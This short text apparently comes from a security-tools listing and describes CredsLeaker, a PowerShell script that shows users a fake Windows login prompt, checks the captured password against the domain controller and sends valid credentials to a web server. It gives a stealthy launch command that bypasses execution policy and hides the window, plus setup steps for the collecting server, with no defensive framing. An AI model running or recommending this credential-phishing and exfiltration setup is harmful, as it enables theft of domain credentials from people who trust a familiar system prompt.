CredsLeaker is a PowerShell script that phishes credentials from the user. It pops up a Windows user authentication prompt and checks the entered details against the domain controller until it has valid credentials. This prompt is common in a domain environment, so the user has likely seen it before.
Once CredsLeaker has valid credentials, it sends them to a web server for storage.
You can download the script and read more on the GitHub project page.
Run the script with the following command:
powershell.exe -executionpolicy bypass -windowstyle hidden -noninteractive -nologo -file "CredsLeaker.ps1"
- Start a web server.
- Enter your server IP address and port in the .ps1 script.
- Execute the batch file.